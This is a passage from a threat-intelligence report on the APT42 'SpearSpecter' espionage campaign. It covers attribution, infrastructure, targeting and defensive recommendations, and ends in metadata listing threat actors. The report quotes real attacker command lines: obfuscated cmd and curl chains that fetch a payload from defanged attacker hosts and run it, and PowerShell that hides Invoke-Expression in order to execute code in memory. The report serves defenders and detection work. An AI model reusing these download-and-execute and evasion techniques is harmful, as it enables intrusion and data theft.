enabling seamless initial\r\naccess, persistent command-and-control (C2), and covert data exfiltration. Notably, Google / Mandiant documents\r\nAPT42 operating multiple infrastructure clusters in parallel and abusing Google Sites to funnel victims to fake\r\nlogins, alongside NICECURL and TAMECAT malware-based operations, patterns we also observe in SpearSpecter.\r\nEach cluster employs different infrastructure sets (e.g., distinct lure domains/CDNs, separate delivery hosts, varied\r\nC2 fronting) yet shares the same tooling and objectives of credential theft, data theft, and long-term espionage. In\r\npractice, this explains minor infrastructure divergences across incidents without weakening the attribution: the\r\nclusters differ in infrastructure, not in mission or tradecraft.\r\nFigure 26: Diamond Model representation of SpearSpecter (APT42).\r\nInfrastructure and Tradecraft Overview\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 43 of 48\n\nOur investigation identified tools, infrastructure components, and operational patterns within SpearSpecter that\r\nstrongly align with activity historically attributed to APT42.\r\nTooling and Capabilities\r\nThe presence of TAMECAT, an implant enabling arbitrary PowerShell/C# execution over HTTP(S) via Base64\r\ntasking, and the Runs.dll component used for data preparation and exfiltration reinforces the APT42 link. This\r\ncombination mirrors the actor's documented preference for reusing familiar implants and lightweight helpers to\r\nsustain access and move data quietly, aligning with prior APT42 operations and our weighting on capability/tool\r\nreuse.\r\nOperational Security (OPSEC) Consistency\r\nSpearSpecter shows repeatable OPSEC habits that help tie activity together.\r\nThese behaviors follow a delivery pattern publicly attributed to APT42/CharmingCypress by Google/Mandiant and\r\nVolexity. Delivery typically involves an .LNK shortcut file that impersonates a decoy document (for example, a\r\nPDF). The LNKs embed obfuscated command lines that are repaired at runtime, and some chains launch PowerShell\r\nstagers that read TAMECAT modules from the attacker's Command and Control and invoke them in memory.\r\nFirst, as part of the initial access phase, an .LNK (impersonate as PDF) file contained deliberately garbled\r\ncommands that are repaired at runtime by removing filler characters. This rebuilds a command, then renames the\r\ndownloaded file, and finally executes it:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c set hm=\"cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt\r\nhtolbtps[://]linolbe[.]complolbetely[.]workolbers[.]deolbv/aoh5 \u0026\r\nrename vgh.tolbxt temolbp.baolbt \u0026 %%tmolbp%% \" \u0026 call %%hm:olb=%%\r\nThe same pattern appears in known NICECURL activity linked to APT42, shown in the Google / Mandiant write-up.\r\nThe actor rebuilds the real curl/POST command that writes to %temp% and then executes it, matching the download,\r\nrename, execute sequence we observed:\r\ncmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d\r\n\"id=CgYEFk\u0026Prog=2_Mal_vbs.txt\u0026WH=Form.pdf\\\" -X PO7ST hxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\\\\down.v7bs \u0026 call %c:7=% \u0026\r\nset b=sta7rt \\\"\\\" \\\"%temp%\\\\down.v7bs\\\" \u0026 call %b:7=%\r\nSecond, as part of the TAMECAT persistence process, a PowerShell script reads commands from a local file and runs\r\nthem in memory using \"Invoke-Expression\", which the attacker obfuscates with a wildcard to evade detection.\r\npowershell -w 1 \"$Pbwpc=(Get-Content -Path\r\n'C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Microsoft\\Windows\\AutoUpdate\\fhgPczTORoCNEDsm.txt');\r\n \u0026(gcm \"i*x) $Pbwpc\"\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 44 of 48\n\nThe pattern mirrors APT42 (CharmingCypress) tradecraft publicly described by Volexity, where PowerShell is used\r\nwith string replacement and wildcards to resolve Invoke-Expression before executing the payload:\r\npowershell -w 1 $pnt=(Get-Content\" -Path\r\nC:\\Users\\\u003credacted\u003e\\AppData\\Roaming\\Microsoft\\documentLoger.txt);\r\n\u0026(gcm \"i*x)$pnt\r\nThird, we observed a string-construction obfuscation technique in TAMECAT (e.g., fhgPczTORoCNEDsm.txt ),\r\nconsistent with public reports on APT42. The implant pieces together a hidden value by taking single characters from\r\nmany small arrays, an obfuscation technique that reconstructs a C2, URL, or command without writing it plainly in\r\nthe code.\r\nluelriciuewwubjtc($tpf[6]+$zxr[0]+$mhx[1]+$yk6[3]+$ul0[7]+$zoo[0]+\r\n$mxe[5]+$dof[0]+$kzm[0]\r\nThis matches the technique shown in Google / Mandiant's example ( Borjol(...) ) where tokens are stitched from\r\narray indices before execution:\r\nBorjol($wvp[5]+$xme[2]+$nwk[3]+$vrl[3]+$gzk[4]+$ni2[0]+$tkk[2]+$kq4[0]+\r\n$yoe[4]+$jwv[0]+\r\n$ywa[0]+$sxi[5]+$bw9[12]+$kgu[1]+$mdi[0]+$ruz[3]+$byh[3]+$sja[3]+\r\n$wqf[0]+$wof[2]+\r\n$mg4[1]+$rfi[5]+$dt9[11]+$qgv[9]+$jt5[0]+$lli[1]+$owd[4]+$lp2[6]+\r\n$wkb[2]+$zen[7]+$sro[0]+\r\n$ta8[0]+$kg9[0]+$esk[8]+$ci4[5]+$oyx[0]+$ico[1]+$xy9[1]+$vvl[0])\r\nAcross three independent behaviors, misspell-then-repair command lines, runtime-resolved PowerShell execution,\r\nand array-index string construction, we see a coherent, repeated OPSEC pattern, hide the strings, resolve/repair at\r\nruntime, then execute. That consistency strengthens the linkage to APT42 in SpearSpecter.\r\nNetwork Infrastructure\r\nSpearSpecter's campaign infrastructure supports initial access, payload delivery, and command-and-control using a\r\nlayered mix of attacker-controlled and cloud-based services.\r\nStage one arrives via a deep, randomized path on filenest[.]info , which redirects to cloudcaravan[.]info ,\r\nwhich abuses the Windows search-ms URI handler to trigger user-driven execution.\r\nStage two then fetches a malicious .LNK from datadrift[.]somee[.]com (a WebDAV-backed host on Somee, a\r\nfree shared-hosting platform that this actor has leveraged in other operations for quick, disposable delivery\r\ninfrastructure).\r\nAfter initial access, operations pivot to the commodity cloud for staging/C2 edges. We observed requests through\r\nfilenest[.]osc-fr1.scalingo.io (multi-tenant PaaS) that linked with others APT42 operations and requests to\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 45 of 48\n\nhosted components on s3[.]tebi[.]io (S3-compatible object storage) was previously reported in TAMECAT\r\nactivity.\r\nTaken together, somee/filenest for ephemeral delivery, synchronized domain activity ( somee[.]com ), and\r\nScalingo/Tebi for staging, this layered, cloud-heavy footprint is consistent with APT42 operations.\r\nVictimology and Targeting\r\nSpearSpecter activity clusters around senior government and defense officials, consistent with APT42's pathway to\r\nsustained intelligence collection on behalf of IRGC-IO. In our case, lures that impersonate legitimate services are\r\npaired with short-lived delivery hosts and cloud telemetry to persist in targeted accounts and enable selective, long-term exfiltration.\r\nNotably, we also observed direct outreach via WhatsApp, consistent with past APT42 operations. The operators\r\ndemonstrate high-end social-engineering tradecraft. They first gather detailed personal and professional context on a\r\ntarget, then initiate contact while impersonating a role or service aligned with that context, which materially\r\nincreases trust and conversion rates. The who (senior officials) and the how (context-driven social engineering to\r\nbuild trust, followed by credential theft and cloud-based persistence) align with the actor's documented mandate and\r\ntradecraft.\r\nTimeline Analysis\r\nThe infrastructure and activity unfolded on a tight, coordinated timeline:\r\ncloudcaravan[.]info and filenest[.]info were both created on 2025-08-17 at 00:00:00 UTC, coming online\r\nconcurrently and consistent with pre-planned, paired staging rather than opportunistic reuse.\r\nAttribution Conclusion\r\nThese infrastructure components routinely enable payload delivery, C2 communication, and data exfiltration\r\nprocesses within APT42's arsenal and campaign.\r\nThis detailed analysis of tools, techniques, and network infrastructure provides strong corroborative evidence linking\r\nSpearSpecter's operational footprint to APT42. It highlights the adversary's sophisticated use of obfuscation, cloud\r\nplatforms, and familiar modular implants for stealthy persistence and data theft in support of Iranian state-sponsored\r\nespionage.\r\nInsights / Recommendations\r\nThe INDA recommends the following to strengthen the organization's security posture against the APT42\r\nSpearSpecter campaign, in particular, and the APT42 operation in general.\r\nVisibilities \u0026 Monitoring\r\nVisibility and monitoring are key in early identification of the campaign and can help contain the attack before any\r\nvaluable data is exfiltrated.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 46 of 48\n\nBecause almost all payloads run only in memory (fileless), a mature host-based visibility is needed. Among other\r\nthings, PowerShell script block logging should be enabled, Sysmon should be installed and configured to report to a\r\nSIEM solution, and an EDR product should be installed.\r\nWe recommend building behavior rules based on the TTPs outlined in this article and monitoring for the IOCs\r\nattached.\r\nIf you believe you may be a target of interest to the IRGC, we recommend using the TTPs and IOCs to perform a\r\nretro hunt across your environments.\r\nEmployee Awareness\r\nAPT42's main initial access tactic is social engineering, mainly targeting high-value targets. Keeping that in mind,\r\nthe organization should prioritize investing in educating senior employees, especially those who may possess data of\r\ninterest to the IRGC.\r\nEducation efforts should emphasize the sophistication of the social engineering used by the group, and should urge\r\nvigilance even when approached by someone from a known organization on a known messaging platform like\r\nWhatsApp, even if the language used seems correct.\r\nEducating users to always double-check with a known and trusted member of the organization that the person is real\r\nand genuinely the one who approached them can significantly reduce the attack vector the group uses.\r\nDisable \"search-ms\" URI protocol handler\r\nAbuse of the search-ms protocol for payload delivery is on the rise. Many threat actors use it to share malware with\r\nvictims without sending files directly, which may be caught by security products. Disabling the search-ms protocol\r\ncan block attackers from sharing the file and serve as a countermeasure to prevent other attacks.\r\nYou can disable the search-ms protocol by running the following command in the Windows Registry Editor:\r\nreg delete HKEY_CLASSES_ROOT\\search /f\r\nreg delete HKEY_CLASSES_ROOT\\search-ms /f\r\nThis prevents the protocol from being used to launch Windows file searches from links or other applications.\r\nNetwork Monitoring \u0026 Filtering\r\nRecent changes by APT42 include using legitimate services as infrastructure, such as Cloudflare workers, Google\r\nFirebase, Discord, and Telegram. Defenders must stay vigilant, even to benign activity. Build a baseline of network\r\nactivity and alert on any deviation, even those made to benign services.\r\nIn addition, it is recommended to use a proxy to filter network activity. While it can't block requests to legitimate\r\nservices later in the attack, it may stop the first stages that use known attacker infrastructure. During incident\r\nresponse, this enables investigators to inspect network activity and build a full picture of the attack.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 47 of 48\n\nMoreover, using a proxy tool with packet inspection capabilities can help detect some of the attacker's activity in the\r\nnetwork, such as an IV key in the HTTP Sec-Host header. Additionally, if the organization knows it doesn't use\r\nTelegram or Discord for its business operations, it can block them as well.\r\nEndpoint Hardening\r\nAPT42 leveraged fileless payloads to evade traditional detection. Most of their activity occurs in memory. Strong\r\nendpoint controls are essential to limiting the attacker's ability to infiltrate and persist in the environment.\r\nConfigure PowerShell to use Constrained Language Mode. Enable AMSI (Antimalware Scan Interface) integration.\r\nEnforce Script Block Logging. These measures help defenders detect suspicious PowerShell activity, even when\r\npayloads never touch disk.\r\nDeploy EPM product, AppLocker, or Windows Defender Application Control policies. These reduce the attack\r\nsurface by preventing unapproved binaries, scripts, and LNK files from running.\r\nConclusion\r\nThe SpearSpecter campaign demonstrates how APT42 is employing targeted social engineering, combined with a\r\nmodular PowerShell backdoor, to obtain data of interest to the IRGC.\r\nThe campaign, with its new TTPs, infrastructure, and TAMECAT modules, demonstrates that the threat actor\r\ncontinues to refine its toolset to achieve its operational goals and stay under the radar for as long as possible.\r\nAPT42, operating in the interests of the Islamic Revolutionary Guard Corps, plays a pivotal role in Iran's\r\nintelligence-gathering efforts, specifically targeting individuals who may possess data of interest to the Islamic\r\nRevolutionary Guard Corps.\r\nSource: https://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 48 of 48", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/" ], "report_names": [ "spearspecter" ], "threat_actors": [ { "id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0", "created_at": "2022-10-25T15:50:23.710403Z", "updated_at": "2026-04-10T02:00:05.281246Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "Whisper Spider" ], "source_name": "MITRE:Silence", "tools": [ "Winexe", "SDelete" ], "source_id": "MITRE", "reports": null }, { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2864e40a-f233-4618-ac61-b03760a41cbb", "created_at": "2023-12-01T02:02:34.272108Z", "updated_at": "2026-04-10T02:00:04.97558Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "ETDA:WildCard", "tools": [ "RustDown", "SysJoker" ], "source_id": "ETDA", "reports": null }, { "id": "d0e8337e-16a7-48f2-90cf-8fd09a7198d1", "created_at": "2023-03-04T02:01:54.091301Z", "updated_at": "2026-04-10T02:00:03.356317Z", "deleted_at": null, "main_name": "APT42", "aliases": [ "UNC788", "CALANQUE" ], "source_name": "MISPGALAXY:APT42", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7", "created_at": "2025-03-29T02:05:20.764715Z", "updated_at": "2026-04-10T02:00:03.851829Z", "deleted_at": null, "main_name": "GOLD WYMAN", "aliases": [ "Silence " ], "source_name": "Secureworks:GOLD WYMAN", "tools": [ "Silence" ], "source_id": "Secureworks", "reports": null }, { "id": "0b212c43-009a-4205-a1f7-545c5e4cfdf8", "created_at": "2025-04-23T02:00:55.275208Z", "updated_at": "2026-04-10T02:00:05.270553Z", "deleted_at": null, "main_name": "APT42", "aliases": [ "APT42" ], "source_name": "MITRE:APT42", "tools": [ "NICECURL", "TAMECAT" ], "source_id": "MITRE", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e", "created_at": "2023-11-30T02:00:07.299845Z", "updated_at": "2026-04-10T02:00:03.484788Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "MISPGALAXY:WildCard", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "88e53203-891a-46f8-9ced-81d874a271c4", "created_at": "2022-10-25T16:07:24.191982Z", "updated_at": "2026-04-10T02:00:04.895327Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "ATK 86", "Contract Crew", "G0091", "TAG-CR8", "TEMP.TruthTeller", "Whisper Spider" ], "source_name": "ETDA:Silence", "tools": [ "EDA", "EmpireDNSAgent", "Farse", "Ivoke", "Kikothac", "LOLBAS", "LOLBins", "Living off the Land", "Meterpreter", "ProxyBot", "ReconModule", "Silence.Downloader", "TiniMet", "TinyMet", "TrueBot", "xfs-disp.exe" ], "source_id": "ETDA", "reports": null }, { "id": "1efe328c-7bda-49d8-82bf-852d220110ae", "created_at": "2026-01-22T02:00:03.661882Z", "updated_at": "2026-04-10T02:00:03.917703Z", "deleted_at": null, "main_name": "Educated Manticore", "aliases": [], "source_name": "MISPGALAXY:Educated Manticore", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434699, "ts_updated_at": 1775826752, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/686b64604331d09ecd155ffe6a379958f2d87b32.pdf", "text": "https://archive.orkl.eu/686b64604331d09ecd155ffe6a379958f2d87b32.txt", "img": "https://archive.orkl.eu/686b64604331d09ecd155ffe6a379958f2d87b32.jpg" } }